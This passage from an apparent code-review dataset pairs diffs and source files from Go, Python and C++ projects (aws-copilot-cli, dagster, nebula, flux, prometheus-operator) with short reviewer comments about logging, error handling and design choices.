10.1.0.0/24,10.1.1.0/24 \ /code --override-private-cidrs 10.1.2.0/24,10.1.3.0/24`, RunE: runCmdE(func(cmd *cobra.Command, args []string) error { opts, err := newInitEnvOpts(vars) if err != nil { return err } if err := opts.Validate(); err != nil { return err } if err := opts.Ask(); err != nil { return err } return opts.Execute() }), } cmd.Flags().StringVarP(&vars.appName, appFlag, appFlagShort, tryReadingAppName(), appFlagDescription) cmd.Flags().StringVarP(&vars.name, nameFlag, nameFlagShort, "", envFlagDescription) cmd.Flags().StringVar(&vars.profile, profileFlag, "", profileFlagDescription) cmd.Flags().StringVar(&vars.tempCreds.AccessKeyID, accessKeyIDFlag, "", accessKeyIDFlagDescription) cmd.Flags().StringVar(&vars.tempCreds.SecretAccessKey, secretAccessKeyFlag, "", secretAccessKeyFlagDescription) cmd.Flags().StringVar(&vars.tempCreds.SessionToken, sessionTokenFlag, "", sessionTokenFlagDescription) cmd.Flags().StringVar(&vars.region, regionFlag, "", envRegionTokenFlagDescription) cmd.Flags().BoolVar(&vars.isProduction, prodEnvFlag, false, prodEnvFlagDescription) cmd.Flags().StringVar(&vars.importVPC.ID, vpcIDFlag, "", vpcIDFlagDescription) cmd.Flags().StringSliceVar(&vars.importVPC.PublicSubnetIDs, publicSubnetsFlag, nil, publicSubnetsFlagDescription) cmd.Flags().StringSliceVar(&vars.importVPC.PrivateSubnetIDs, privateSubnetsFlag, nil, privateSubnetsFlagDescription) cmd.Flags().IPNetVar(&vars.adjustVPC.CIDR, vpcCIDRFlag, net.IPNet{}, vpcCIDRFlagDescription) // TODO: use IPNetSliceVar when it is available (https://github.com/spf13/pflag/issues/273). cmd.Flags().StringSliceVar(&vars.adjustVPC.PublicSubnetCIDRs, publicSubnetCIDRsFlag, nil, publicSubnetCIDRsFlagDescription) cmd.Flags().StringSliceVar(&vars.adjustVPC.PrivateSubnetCIDRs, privateSubnetCIDRsFlag, nil, privateSubnetCIDRsFlagDescription) cmd.Flags().BoolVar(&vars.defaultConfig, defaultConfigFlag, false, defaultConfigFlagDescription) flags := pflag.NewFlagSet("Common", pflag.ContinueOnError) flags.AddFlag(cmd.Flags().Lookup(appFlag)) flags.AddFlag(cmd.Flags().Lookup(nameFlag)) flags.AddFlag(cmd.Flags().Lookup(profileFlag)) flags.AddFlag(cmd.Flags().Lookup(accessKeyIDFlag)) flags.AddFlag(cmd.Flags().Lookup(secretAccessKeyFlag)) flags.AddFlag(cmd.Flags().Lookup(sessionTokenFlag)) flags.AddFlag(cmd.Flags().Lookup(regionFlag)) flags.AddFlag(cmd.Flags().Lookup(defaultConfigFlag)) flags.AddFlag(cmd.Flags().Lookup(prodEnvFlag)) resourcesImportFlag := pflag.NewFlagSet("Import Existing Resources", pflag.ContinueOnError) resourcesImportFlag.AddFlag(cmd.Flags().Lookup(vpcIDFlag)) resourcesImportFlag.AddFlag(cmd.Flags().Lookup(publicSubnetsFlag)) resourcesImportFlag.AddFlag(cmd.Flags().Lookup(privateSubnetsFlag)) resourcesConfigFlag := pflag.NewFlagSet("Configure Default Resources", pflag.ContinueOnError) resourcesConfigFlag.AddFlag(cmd.Flags().Lookup(vpcCIDRFlag)) resourcesConfigFlag.AddFlag(cmd.Flags().Lookup(publicSubnetCIDRsFlag)) resourcesConfigFlag.AddFlag(cmd.Flags().Lookup(privateSubnetCIDRsFlag)) cmd.Annotations = map[string]string{ // The order of the sections we want to display. "sections": "Common,Import Existing Resources,Configure Default Resources", "Common": flags.FlagUsages(), "Import Existing Resources": resourcesImportFlag.FlagUsages(), "Configure Default Resources": resourcesConfigFlag.FlagUsages(), } cmd.SetUsageTemplate(`{{h1 "Usage"}}{{if .Runnable}} {{.UseLine}}{{end}}{{$annotations := .Annotations}}{{$sections := split .Annotations.sections ","}}{{if gt (len $sections) 0}} {{range $i, $sectionName := $sections}}{{h1 (print $sectionName " Flags")}} {{(index $annotations $sectionName) | trimTrailingWhitespaces}}{{if ne (inc $i) (len $sections)}} {{end}}{{end}}{{end}}{{if .HasAvailableInheritedFlags}} {{h1 "Global Flags"}} {{.InheritedFlags.FlagUsages | trimTrailingWhitespaces}}{{end}}{{if .HasExample}} {{h1 "Examples"}}{{code .Example}}{{end}} `) return cmd }
1
17,620
can we update this to a `log.Warningf`?
aws-copilot-cli
go
@@ -105,7 +105,11 @@ def connect_container_to_network(container, network): def disconnect_container_from_network(container, network): - subprocess.check_call(["docker", "network", "disconnect", network, container]) + # subprocess.run instead of subprocess.check_call so we don't fail when + # trying to disconnect a container from a network that it's not connected to + subprocess.run( # pylint: disable=subprocess-run-check + ["docker", "network", "disconnect", network, container] + ) def hostnames(network):
1
# pylint: disable=redefined-outer-name import json import os import subprocess from contextlib import contextmanager import pytest from .utils import BUILDKITE @pytest.fixture(scope="module") def docker_compose_cm(test_directory): @contextmanager def docker_compose( docker_compose_yml=None, network_name=None, docker_context=None, service=None, ): if not docker_compose_yml: docker_compose_yml = default_docker_compose_yml(test_directory) if not network_name: network_name = network_name_from_yml(docker_compose_yml) try: docker_compose_up(docker_compose_yml, docker_context, service) if BUILDKITE: # When running in a container on Buildkite, we need to first connect our container # and our network and then yield a dict of container name to the container's # hostname. with buildkite_hostnames_cm(network_name) as hostnames: yield hostnames else: # When running locally, we don't need to jump through any special networking hoops; # just yield a dict of container name to "localhost". yield dict((container, "localhost") for container in list_containers()) finally: docker_compose_down(docker_compose_yml, docker_context, service) return docker_compose @pytest.fixture def docker_compose(docker_compose_cm): with docker_compose_cm() as docker_compose: yield docker_compose def docker_compose_up(docker_compose_yml, context, service): if context: compose_command = ["docker", "--context", context, "compose"] else: compose_command = ["docker-compose"] compose_command += [ "--file", str(docker_compose_yml), "up", "--detach", ] if service: compose_command.append(service) subprocess.check_call(compose_command) def docker_compose_down(docker_compose_yml, context, service): if context: compose_command = ["docker", "--context", context, "compose"] else: compose_command = ["docker-compose"] compose_command += ["--file", str(docker_compose_yml), "down", "--volumes", "--remove-orphans"] if service: compose_command.append(service) subprocess.check_call(compose_command) def list_containers(): # TODO: Handle default container names: {project_name}_service_{task_number} return subprocess.check_output(["docker", "ps", "--format", "{{.Names}}"]).decode().splitlines() def current_container(): container_id = subprocess.check_output(["cat", "/etc/hostname"]).strip().decode() container = ( subprocess.check_output( ["docker", "ps", "--filter", f"id={container_id}", "--format", "{{.Names}}"] ) .strip() .decode() ) return container def connect_container_to_network(container, network): # subprocess.run instead of subprocess.check_call so we don't fail when # trying to connect a container to a network that it's already connected to subprocess.run( # pylint: disable=subprocess-run-check ["docker", "network", "connect", network, container] ) def disconnect_container_from_network(container, network): subprocess.check_call(["docker", "network", "disconnect", network, container]) def hostnames(network): hostnames = {} for container in list_containers(): output = subprocess.check_output(["docker", "inspect", container]) networking = json.loads(output)[0]["NetworkSettings"] hostname = networking["Networks"].get(network, {}).get("IPAddress") if hostname: hostnames[container] = hostname return hostnames @contextmanager def buildkite_hostnames_cm(network): container = current_container() try: connect_container_to_network(container, network) yield hostnames(network) finally: disconnect_container_from_network(container, network) def default_docker_compose_yml(default_directory): if os.path.isfile("docker-compose.yml"): return os.path.join(os.getcwd(), "docker-compose.yml") else: return os.path.join(default_directory, "docker-compose.yml") def network_name_from_yml(docker_compose_yml): dirname = os.path.dirname(docker_compose_yml) basename = os.path.basename(dirname) return basename + "_default"
1
18,298
can we get something emitted in the logs on non-zero exits to trace back to for problems like this failing on the first invocation?
dagster-io-dagster
py
@@ -20,9 +20,10 @@ namespace storage { TEST(DeleteVertexTest, SimpleTest) { fs::TempDir rootPath("/tmp/DeleteVertexTest.XXXXXX"); std::unique_ptr<kvstore::KVStore> kv(TestUtils::initKV(rootPath.path())); + auto schemaMan = TestUtils::mockSchemaMan(); // Add vertices { - auto* processor = AddVerticesProcessor::instance(kv.get(), nullptr, nullptr); + auto* processor = AddVerticesProcessor::instance(kv.get(), schemaMan.get(), nullptr); cpp2::AddVerticesRequest req; req.space_id = 0; req.overwritable = false;
1
/* Copyright (c) 2019 vesoft inc. All rights reserved. * * This source code is licensed under Apache 2.0 License, * attached with Common Clause Condition 1.0, found in the LICENSES directory. */ #include "base/Base.h" #include <gtest/gtest.h> #include <rocksdb/db.h> #include "fs/TempDir.h" #include "storage/test/TestUtils.h" #include "storage/mutate/DeleteVertexProcessor.h" #include "storage/mutate/AddVerticesProcessor.h" #include "base/NebulaKeyUtils.h" namespace nebula { namespace storage { TEST(DeleteVertexTest, SimpleTest) { fs::TempDir rootPath("/tmp/DeleteVertexTest.XXXXXX"); std::unique_ptr<kvstore::KVStore> kv(TestUtils::initKV(rootPath.path())); // Add vertices { auto* processor = AddVerticesProcessor::instance(kv.get(), nullptr, nullptr); cpp2::AddVerticesRequest req; req.space_id = 0; req.overwritable = false; // partId => List<Vertex> for (auto partId = 0; partId < 3; partId++) { std::vector<cpp2::Vertex> vertices; for (auto vertexId = partId * 10; vertexId < 10 * (partId + 1); vertexId++) { std::vector<cpp2::Tag> tags; for (auto tagId = 0; tagId < 10; tagId++) { tags.emplace_back(apache::thrift::FragileConstructor::FRAGILE, tagId, folly::stringPrintf("%d_%d_%d", partId, vertexId, tagId)); } vertices.emplace_back(apache::thrift::FragileConstructor::FRAGILE, vertexId, std::move(tags)); } req.parts.emplace(partId, std::move(vertices)); } auto fut = processor->getFuture(); processor->process(req); auto resp = std::move(fut).get(); EXPECT_EQ(0, resp.result.failed_codes.size()); for (auto partId = 0; partId < 3; partId++) { for (auto vertexId = 10 * partId; vertexId < 10 * (partId + 1); vertexId++) { auto prefix = NebulaKeyUtils::vertexPrefix(partId, vertexId); std::unique_ptr<kvstore::KVIterator> iter; EXPECT_EQ(kvstore::ResultCode::SUCCEEDED, kv->prefix(0, partId, prefix, &iter)); TagID tagId = 0; while (iter->valid()) { EXPECT_EQ(folly::stringPrintf("%d_%d_%d", partId, vertexId, tagId), iter->val()); tagId++; iter->next(); } EXPECT_EQ(10, tagId); } } } // Delete vertices { for (auto partId = 0; partId < 3; partId++) { for (auto vertexId = 10 * partId; vertexId < 10 * (partId + 1); vertexId++) { auto* processor = DeleteVertexProcessor::instance(kv.get(), nullptr, nullptr); cpp2::DeleteVertexRequest req; req.set_space_id(0); req.set_part_id(partId); req.set_vid(vertexId); auto fut = processor->getFuture(); processor->process(req); auto resp = std::move(fut).get(); EXPECT_EQ(0, resp.result.failed_codes.size()); } } } for (auto partId = 0; partId < 3; partId++) { for (auto vertexId = 10 * partId; vertexId < 10 * (partId + 1); vertexId++) { auto prefix = NebulaKeyUtils::vertexPrefix(partId, vertexId); std::unique_ptr<kvstore::KVIterator> iter; EXPECT_EQ(kvstore::ResultCode::SUCCEEDED, kv->prefix(0, partId, prefix, &iter)); CHECK(!iter->valid()); } } } } // namespace storage } // namespace nebula int main(int argc, char** argv) { testing::InitGoogleTest(&argc, argv); folly::init(&argc, &argv, true); google::SetStderrLogging(google::INFO); return RUN_ALL_TESTS(); }
1
25,336
Do we need `schema manager` at here ?
vesoft-inc-nebula
cpp
@@ -0,0 +1,19 @@ +package parser + +//go:generate cargo build --release + +// #cgo LDFLAGS: -L${SRCDIR}/target/release -ldl -Wl,-Bstatic -lflux_parser -Wl,-Bdynamic +// #include <stdlib.h> +// void flux_parse_json(const char*); +import "C" + +import ( + "unsafe" +) + +func Parse(input string) { + cstr := C.CString(input) + defer C.free(unsafe.Pointer(cstr)) + + C.flux_parse_json(cstr) +}
1
1
12,039
This won't work because of the permissions on the directory when this is included as a library. But, we may be able to do this. The key would be wrapping this command with either a script or a go binary that ensures the current directory is writable. If the current directory is not writable, it would attempt to make it writable so that we could write out the produced binary. But I'm not sure if that will influence the hash that gets produced for `go.sum` since I am not sure how that is calculated. Alternatively, we can choose a place in `/usr/local` or choose a location that is writable in the go cache and use that. I'll give that a try since it might be needed for the ARM builds if we choose to only include `x86_64` precompiled binaries in the module.
influxdata-flux
go
@@ -153,6 +153,8 @@ func (r *REPL) executeLine(t string) (values.Value, error) { return nil, err } + r.scope.SetReturn(nil) + if _, err := r.interpreter.Eval(semPkg, r.scope, flux.StdLib()); err != nil { return nil, err }
1
// Package repl implements the read-eval-print-loop for the command line flux query console. package repl import ( "context" "fmt" "io/ioutil" "os" "os/signal" "path/filepath" "sort" "strings" "sync" "syscall" "github.com/influxdata/flux/ast" prompt "github.com/c-bata/go-prompt" "github.com/influxdata/flux" "github.com/influxdata/flux/execute" "github.com/influxdata/flux/interpreter" "github.com/influxdata/flux/lang" "github.com/influxdata/flux/parser" "github.com/influxdata/flux/semantic" "github.com/influxdata/flux/values" ) type REPL struct { interpreter *interpreter.Interpreter scope interpreter.Scope querier Querier cancelMu sync.Mutex cancelFunc context.CancelFunc } type Querier interface { Query(ctx context.Context, compiler flux.Compiler) (flux.ResultIterator, error) } func New(q Querier) *REPL { return &REPL{ interpreter: interpreter.NewInterpreter(), scope: flux.Prelude(), querier: q, } } func (r *REPL) Run() { p := prompt.New( r.input, r.completer, prompt.OptionPrefix("> "), prompt.OptionTitle("flux"), ) sigs := make(chan os.Signal, 1) signal.Notify(sigs, syscall.SIGINT) go func() { for range sigs { r.cancel() } }() p.Run() } func (r *REPL) cancel() { r.cancelMu.Lock() defer r.cancelMu.Unlock() if r.cancelFunc != nil { r.cancelFunc() r.cancelFunc = nil } } func (r *REPL) setCancel(cf context.CancelFunc) { r.cancelMu.Lock() defer r.cancelMu.Unlock() r.cancelFunc = cf } func (r *REPL) clearCancel() { r.setCancel(nil) } func (r *REPL) completer(d prompt.Document) []prompt.Suggest { names := make([]string, 0, r.scope.Size()) r.scope.Range(func(k string, v values.Value) { names = append(names, k) }) sort.Strings(names) s := make([]prompt.Suggest, 0, len(names)) for _, n := range names { if n == "_" || !strings.HasPrefix(n, "_") { s = append(s, prompt.Suggest{Text: n}) } } if d.Text == "" || strings.HasPrefix(d.Text, "@") { root := "./" + strings.TrimPrefix(d.Text, "@") fluxFiles, err := getFluxFiles(root) if err == nil { for _, fName := range fluxFiles { s = append(s, prompt.Suggest{Text: "@" + fName}) } } dirs, err := getDirs(root) if err == nil { for _, fName := range dirs { s = append(s, prompt.Suggest{Text: "@" + fName + string(os.PathSeparator)}) } } } return prompt.FilterHasPrefix(s, d.GetWordBeforeCursor(), true) } func (r *REPL) Input(t string) error { _, err := r.executeLine(t) return err } // input processes a line of input and prints the result. func (r *REPL) input(t string) { v, err := r.executeLine(t) if err != nil { fmt.Println("Error:", err) } else if v != nil { fmt.Println(v) } } // executeLine processes a line of input. // If the input evaluates to a valid value, that value is returned. func (r *REPL) executeLine(t string) (values.Value, error) { if t == "" { return nil, nil } if t[0] == '@' { q, err := LoadQuery(t) if err != nil { return nil, err } t = q } astPkg := parser.ParseSource(t) if ast.Check(astPkg) > 0 { return nil, ast.GetError(astPkg) } semPkg, err := semantic.New(astPkg) if err != nil { return nil, err } if _, err := r.interpreter.Eval(semPkg, r.scope, flux.StdLib()); err != nil { return nil, err } v := r.scope.Return() // Ignore statements that do not return a value if v == nil { return nil, nil } // Check for yield and execute query if v.Type() == flux.TableObjectMonoType { t := v.(*flux.TableObject) now, ok := r.scope.Lookup("now") if !ok { return nil, fmt.Errorf("now option not set") } nowTime, err := now.Function().Call(nil) if err != nil { return nil, err } spec, err := flux.ToSpec([]values.Value{t}, nowTime.Time().Time()) if err != nil { return nil, err } return nil, r.doQuery(spec) } // Print value if v.Type() != semantic.Invalid { return v, nil } return nil, nil } func (r *REPL) doQuery(spec *flux.Spec) error { // Setup cancel context ctx, cancelFunc := context.WithCancel(context.Background()) r.setCancel(cancelFunc) defer cancelFunc() defer r.clearCancel() compiler := lang.SpecCompiler{ Spec: spec, } results, err := r.querier.Query(ctx, compiler) if err != nil { return err } defer results.Release() for results.More() { result := results.Next() tables := result.Tables() fmt.Println("Result:", result.Name()) err := tables.Do(func(tbl flux.Table) error { _, err := execute.NewFormatter(tbl, nil).WriteTo(os.Stdout) return err }) if err != nil { return err } } return results.Err() } func getFluxFiles(path string) ([]string, error) { return filepath.Glob(path + "*.flux") } func getDirs(path string) ([]string, error) { dir := filepath.Dir(path) files, err := ioutil.ReadDir(dir) if err != nil { return nil, err } dirs := make([]string, 0, len(files)) for _, f := range files { if f.IsDir() { dirs = append(dirs, filepath.Join(dir, f.Name())) } } return dirs, nil } // LoadQuery returns the Flux query q, except for two special cases: // if q is exactly "-", the query will be read from stdin; // and if the first character of q is "@", // the @ prefix is removed and the contents of the file specified by the rest of q are returned. func LoadQuery(q string) (string, error) { if q == "-" { data, err := ioutil.ReadAll(os.Stdin) if err != nil { return "", err } return string(data), nil } if len(q) > 0 && q[0] == '@' { data, err := ioutil.ReadFile(q[1:]) if err != nil { return "", err } return string(data), nil } return q, nil }
1
9,624
Correct me if I'm wrong, but is this necessary? Why not just use the value returned by `interpreter.Eval` and not mess with the scope? `interpreter.Eval` will return any produced side effects. This means TableObjects as well as any value resulting from any expression statements.
influxdata-flux
go
@@ -162,12 +162,14 @@ func makeStatefulSetService(p *monitoringv1.Alertmanager, config Config) *v1.Ser p.Spec.PortName = defaultPortName } + labels := config.Labels.Merge(p.Spec.ServiceMetadata.Labels) + labels["operated-alertmanager"] = "true" + svc := &v1.Service{ ObjectMeta: metav1.ObjectMeta{ - Name: governingServiceName, - Labels: config.Labels.Merge(map[string]string{ - "operated-alertmanager": "true", - }), + Name: governingServiceName, + Labels: labels, + Annotations: p.Spec.ServiceMetadata.Annotations, OwnerReferences: []metav1.OwnerReference{ metav1.OwnerReference{ Name: p.GetName(),
1
// Copyright 2016 The prometheus-operator Authors // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package alertmanager import ( "fmt" "net/url" "path" "strings" appsv1 "k8s.io/api/apps/v1" v1 "k8s.io/api/core/v1" "k8s.io/apimachinery/pkg/api/resource" metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" "k8s.io/apimachinery/pkg/util/intstr" "github.com/blang/semver" "github.com/pkg/errors" monitoringv1 "github.com/prometheus-operator/prometheus-operator/pkg/apis/monitoring/v1" "github.com/prometheus-operator/prometheus-operator/pkg/k8sutil" "github.com/prometheus-operator/prometheus-operator/pkg/operator" ) const ( governingServiceName = "alertmanager-operated" defaultRetention = "120h" secretsDir = "/etc/alertmanager/secrets/" configmapsDir = "/etc/alertmanager/configmaps/" alertmanagerConfDir = "/etc/alertmanager/config" alertmanagerConfFile = alertmanagerConfDir + "/alertmanager.yaml" alertmanagerStorageDir = "/alertmanager" defaultPortName = "web" ) var ( minReplicas int32 = 1 probeTimeoutSeconds int32 = 3 ) func makeStatefulSet(am *monitoringv1.Alertmanager, old *appsv1.StatefulSet, config Config) (*appsv1.StatefulSet, error) { // TODO(fabxc): is this the right point to inject defaults? // Ideally we would do it before storing but that's currently not possible. // Potentially an update handler on first insertion. if am.Spec.PortName == "" { am.Spec.PortName = defaultPortName } if am.Spec.Replicas == nil { am.Spec.Replicas = &minReplicas } intZero := int32(0) if am.Spec.Replicas != nil && *am.Spec.Replicas < 0 { am.Spec.Replicas = &intZero } if am.Spec.Retention == "" { am.Spec.Retention = defaultRetention } if am.Spec.Resources.Requests == nil { am.Spec.Resources.Requests = v1.ResourceList{} } if _, ok := am.Spec.Resources.Requests[v1.ResourceMemory]; !ok { am.Spec.Resources.Requests[v1.ResourceMemory] = resource.MustParse("200Mi") } if am.Spec.ConfigSecret == "" { am.Spec.ConfigSecret = configSecretName(am.Name) } spec, err := makeStatefulSetSpec(am, config) if err != nil { return nil, err } boolTrue := true // do not transfer kubectl annotations to the statefulset so it is not // pruned by kubectl annotations := make(map[string]string) for key, value := range am.ObjectMeta.Annotations { if !strings.HasPrefix(key, "kubectl.kubernetes.io/") { annotations[key] = value } } statefulset := &appsv1.StatefulSet{ ObjectMeta: metav1.ObjectMeta{ Name: prefixedName(am.Name), Labels: config.Labels.Merge(am.ObjectMeta.Labels), Annotations: annotations, OwnerReferences: []metav1.OwnerReference{ { APIVersion: am.APIVersion, BlockOwnerDeletion: &boolTrue, Controller: &boolTrue, Kind: am.Kind, Name: am.Name, UID: am.UID, }, }, }, Spec: *spec, } if am.Spec.ImagePullSecrets != nil && len(am.Spec.ImagePullSecrets) > 0 { statefulset.Spec.Template.Spec.ImagePullSecrets = am.Spec.ImagePullSecrets } storageSpec := am.Spec.Storage if storageSpec == nil { statefulset.Spec.Template.Spec.Volumes = append(statefulset.Spec.Template.Spec.Volumes, v1.Volume{ Name: volumeName(am.Name), VolumeSource: v1.VolumeSource{ EmptyDir: &v1.EmptyDirVolumeSource{}, }, }) } else if storageSpec.EmptyDir != nil { emptyDir := storageSpec.EmptyDir statefulset.Spec.Template.Spec.Volumes = append(statefulset.Spec.Template.Spec.Volumes, v1.Volume{ Name: volumeName(am.Name), VolumeSource: v1.VolumeSource{ EmptyDir: emptyDir, }, }) } else { pvcTemplate := operator.MakeVolumeClaimTemplate(storageSpec.VolumeClaimTemplate) if pvcTemplate.Name == "" { pvcTemplate.Name = volumeName(am.Name) } if storageSpec.VolumeClaimTemplate.Spec.AccessModes == nil { pvcTemplate.Spec.AccessModes = []v1.PersistentVolumeAccessMode{v1.ReadWriteOnce} } else { pvcTemplate.Spec.AccessModes = storageSpec.VolumeClaimTemplate.Spec.AccessModes } pvcTemplate.Spec.Resources = storageSpec.VolumeClaimTemplate.Spec.Resources pvcTemplate.Spec.Selector = storageSpec.VolumeClaimTemplate.Spec.Selector statefulset.Spec.VolumeClaimTemplates = append(statefulset.Spec.VolumeClaimTemplates, *pvcTemplate) } if old != nil { statefulset.Annotations = old.Annotations } for _, volume := range am.Spec.Volumes { statefulset.Spec.Template.Spec.Volumes = append(statefulset.Spec.Template.Spec.Volumes, volume) } return statefulset, nil } func makeStatefulSetService(p *monitoringv1.Alertmanager, config Config) *v1.Service { if p.Spec.PortName == "" { p.Spec.PortName = defaultPortName } svc := &v1.Service{ ObjectMeta: metav1.ObjectMeta{ Name: governingServiceName, Labels: config.Labels.Merge(map[string]string{ "operated-alertmanager": "true", }), OwnerReferences: []metav1.OwnerReference{ metav1.OwnerReference{ Name: p.GetName(), Kind: p.Kind, APIVersion: p.APIVersion, UID: p.GetUID(), }, }, }, Spec: v1.ServiceSpec{ ClusterIP: "None", Ports: []v1.ServicePort{ { Name: p.Spec.PortName, Port: 9093, TargetPort: intstr.FromString(p.Spec.PortName), Protocol: v1.ProtocolTCP, }, { Name: "tcp-mesh", Port: 9094, TargetPort: intstr.FromInt(9094), Protocol: v1.ProtocolTCP, }, { Name: "udp-mesh", Port: 9094, TargetPort: intstr.FromInt(9094), Protocol: v1.ProtocolUDP, }, }, Selector: map[string]string{ "app": "alertmanager", }, }, } return svc } func makeStatefulSetSpec(a *monitoringv1.Alertmanager, config Config) (*appsv1.StatefulSetSpec, error) { // Before editing 'a' create deep copy, to prevent side effects. For more // details see https://github.com/prometheus-operator/prometheus-operator/issues/1659 a = a.DeepCopy() amBaseImage := operator.StringValOrDefault(a.Spec.BaseImage, operator.DefaultAlertmanagerBaseImage) amVersion := operator.StringValOrDefault(a.Spec.Version, operator.DefaultAlertmanagerVersion) amTag := operator.StringValOrDefault(a.Spec.Tag, "") amSHA := operator.StringValOrDefault(a.Spec.SHA, "") amImagePath, err := operator.BuildImagePath(amBaseImage, amVersion, amTag, amSHA) if err != nil { return nil, errors.Wrap(err, "failed to build image path") } if a.Spec.Image != nil && strings.TrimSpace(*a.Spec.Image) != "" { amImagePath = *a.Spec.Image } version, err := semver.ParseTolerant(amVersion) if err != nil { return nil, errors.Wrap(err, "failed to parse alertmanager version") } amArgs := []string{ fmt.Sprintf("--config.file=%s", alertmanagerConfFile), fmt.Sprintf("--storage.path=%s", alertmanagerStorageDir), fmt.Sprintf("--data.retention=%s", a.Spec.Retention), } if *a.Spec.Replicas == 1 && !a.Spec.ForceEnableClusterMode { amArgs = append(amArgs, "--cluster.listen-address=") } else { amArgs = append(amArgs, "--cluster.listen-address=[$(POD_IP)]:9094") } if a.Spec.ListenLocal { amArgs = append(amArgs, "--web.listen-address=127.0.0.1:9093") } else { amArgs = append(amArgs, "--web.listen-address=:9093") } if a.Spec.ExternalURL != "" { amArgs = append(amArgs, "--web.external-url="+a.Spec.ExternalURL) } webRoutePrefix := "/" if a.Spec.RoutePrefix != "" { webRoutePrefix = a.Spec.RoutePrefix } amArgs = append(amArgs, fmt.Sprintf("--web.route-prefix=%v", webRoutePrefix)) if a.Spec.LogLevel != "" && a.Spec.LogLevel != "info" { amArgs = append(amArgs, fmt.Sprintf("--log.level=%s", a.Spec.LogLevel)) } if version.GTE(semver.MustParse("0.16.0")) { if a.Spec.LogFormat != "" && a.Spec.LogFormat != "logfmt" { amArgs = append(amArgs, fmt.Sprintf("--log.format=%s", a.Spec.LogFormat)) } } if a.Spec.ClusterAdvertiseAddress != "" { amArgs = append(amArgs, fmt.Sprintf("--cluster.advertise-address=%s", a.Spec.ClusterAdvertiseAddress)) } localReloadURL := &url.URL{ Scheme: "http", Host: config.LocalHost + ":9093", Path: path.Clean(webRoutePrefix + "/-/reload"), } livenessProbeHandler := v1.Handler{ HTTPGet: &v1.HTTPGetAction{ Path: path.Clean(webRoutePrefix + "/-/healthy"), Port: intstr.FromString(a.Spec.PortName), }, } readinessProbeHandler := v1.Handler{ HTTPGet: &v1.HTTPGetAction{ Path: path.Clean(webRoutePrefix + "/-/ready"), Port: intstr.FromString(a.Spec.PortName), }, } var livenessProbe *v1.Probe var readinessProbe *v1.Probe if !a.Spec.ListenLocal { livenessProbe = &v1.Probe{ Handler: livenessProbeHandler, TimeoutSeconds: probeTimeoutSeconds, FailureThreshold: 10, } readinessProbe = &v1.Probe{ Handler: readinessProbeHandler, InitialDelaySeconds: 3, TimeoutSeconds: 3, PeriodSeconds: 5, FailureThreshold: 10, } } podAnnotations := map[string]string{} podLabels := map[string]string{} podSelectorLabels := map[string]string{ "app": "alertmanager", "alertmanager": a.Name, } if a.Spec.PodMetadata != nil { if a.Spec.PodMetadata.Labels != nil { for k, v := range a.Spec.PodMetadata.Labels { podLabels[k] = v } } if a.Spec.PodMetadata.Annotations != nil { for k, v := range a.Spec.PodMetadata.Annotations { podAnnotations[k] = v } } } for k, v := range podSelectorLabels { podLabels[k] = v } var clusterPeerDomain string if config.ClusterDomain != "" { clusterPeerDomain = fmt.Sprintf("%s.%s.svc.%s.", governingServiceName, a.Namespace, config.ClusterDomain) } else { // The default DNS search path is .svc.<cluster domain> clusterPeerDomain = governingServiceName } for i := int32(0); i < *a.Spec.Replicas; i++ { amArgs = append(amArgs, fmt.Sprintf("--cluster.peer=%s-%d.%s:9094", prefixedName(a.Name), i, clusterPeerDomain)) } for _, peer := range a.Spec.AdditionalPeers { amArgs = append(amArgs, fmt.Sprintf("--cluster.peer=%s", peer)) } ports := []v1.ContainerPort{ { Name: "mesh-tcp", ContainerPort: 9094, Protocol: v1.ProtocolTCP, }, { Name: "mesh-udp", ContainerPort: 9094, Protocol: v1.ProtocolUDP, }, } if !a.Spec.ListenLocal { ports = append([]v1.ContainerPort{ { Name: a.Spec.PortName, ContainerPort: 9093, Protocol: v1.ProtocolTCP, }, }, ports...) } // Adjust Alertmanager command line args to specified AM version // // Alertmanager versions < v0.15.0 are only supported on a best effort basis // starting with Prometheus Operator v0.30.0. switch version.Major { case 0: if version.Minor < 15 { for i := range amArgs { // below Alertmanager v0.15.0 peer address port specification is not necessary if strings.Contains(amArgs[i], "--cluster.peer") { amArgs[i] = strings.TrimSuffix(amArgs[i], ":9094") } // below Alertmanager v0.15.0 high availability flags are prefixed with 'mesh' instead of 'cluster' amArgs[i] = strings.Replace(amArgs[i], "--cluster.", "--mesh.", 1) } } else { // reconnect-timeout was added in 0.15 (https://github.com/prometheus/alertmanager/pull/1384) // Override default 6h value to allow AlertManager cluster to // quickly remove a cluster member after its pod restarted or during a // regular rolling update. amArgs = append(amArgs, "--cluster.reconnect-timeout=5m") } if version.Minor < 13 { for i := range amArgs { // below Alertmanager v0.13.0 all flags are with single dash. amArgs[i] = strings.Replace(amArgs[i], "--", "-", 1) } } if version.Minor < 7 { // below Alertmanager v0.7.0 the flag 'web.route-prefix' does not exist amArgs = filter(amArgs, func(s string) bool { return !strings.Contains(s, "web.route-prefix") }) } default: return nil, errors.Errorf("unsupported Alertmanager major version %s", version) } volumes := []v1.Volume{ { Name: "config-volume", VolumeSource: v1.VolumeSource{ Secret: &v1.SecretVolumeSource{ SecretName: a.Spec.ConfigSecret, }, }, }, } volName := volumeName(a.Name) if a.Spec.Storage != nil { if a.Spec.Storage.VolumeClaimTemplate.Name != "" { volName = a.Spec.Storage.VolumeClaimTemplate.Name } } amVolumeMounts := []v1.VolumeMount{ { Name: "config-volume", MountPath: alertmanagerConfDir, }, { Name: volName, MountPath: alertmanagerStorageDir, SubPath: subPathForStorage(a.Spec.Storage), }, } reloadWatchDirs := []string{alertmanagerConfDir} configReloaderVolumeMounts := []v1.VolumeMount{ { Name: "config-volume", MountPath: alertmanagerConfDir, ReadOnly: true, }, } for _, s := range a.Spec.Secrets { volumes = append(volumes, v1.Volume{ Name: k8sutil.SanitizeVolumeName("secret-" + s), VolumeSource: v1.VolumeSource{ Secret: &v1.SecretVolumeSource{ SecretName: s, }, }, }) mountPath := secretsDir + s mount := v1.VolumeMount{ Name: k8sutil.SanitizeVolumeName("secret-" + s), ReadOnly: true, MountPath: mountPath, } amVolumeMounts = append(amVolumeMounts, mount) configReloaderVolumeMounts = append(configReloaderVolumeMounts, mount) reloadWatchDirs = append(reloadWatchDirs, mountPath) } for _, c := range 